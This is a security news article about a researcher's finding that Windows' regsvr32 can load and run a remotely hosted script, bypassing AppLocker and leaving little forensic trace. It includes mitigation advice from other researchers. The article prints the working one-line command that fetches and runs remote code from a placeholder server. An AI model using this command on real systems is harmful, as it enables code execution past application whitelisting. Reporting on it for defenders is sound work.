Researcher uses Regsvr32 function to bypass AppLocker

A researcher in Colorado has discovered a feature in Regsvr32 that allows an attacker to bypass application whitelisting protections, such as those afforded by Microsoft’s AppLocker. If the technique is used, there’s little evidence left behind for investigators, as the process doesn’t alter the system registry and in some cases comes across as normal Internet Explorer traffic.

Casey Smith, a researcher in Colorado, needed to install a reverse shell, but the workstation in question was locked down by AppLocker and script rules. After some trial an error, he discovered an interesting solution:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” Smith wrote.

Up until this week, few people – if any – knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all an attacker has to do is place the code block (VP or JS) inside the registration element. Smith published several proof-of-concept scripts, which other researchers confirmed work as expected.

If used, this command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. It’s certainly a neat trick. As Smith wrote, it doesn’t alter the registry, it doesn’t require administrative privileges, and the scripts can be called over HTTP or HTTPS.

Salted Hash as reached out to Microsoft for comment, and we’ll update this story if they chose to respond.

“Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective,” wrote an information security consultant in Southern California who goes by the handle Munin.

Regsvr32 is whitelisted, seen as an essential system function. The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs (external or local).

“Kind of like early Web browsers, when JavaScript first came out,” Munin explained to Salted Hash.

Munin said that a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the “Temporary Internet Files” folder.

There is no patch available, but Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. It’s possible that blocks on Regsvr32.exe and Regsvr64.exe will be needed for full effectiveness.

Other researchers have said that Device Guard, fully enabled with script protection will block this bypass as well, but that would require that the organization have Windows 10 Enterprise and Hyper-V on the system in question.

“This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible,” Munin said.

Update: Several readers have emailed (in addition to the comment below) to say that .sct files shouldn’t be used as an indicator, as any file extension will work. This will make investigations all the more difficult until Microsoft does something about this function.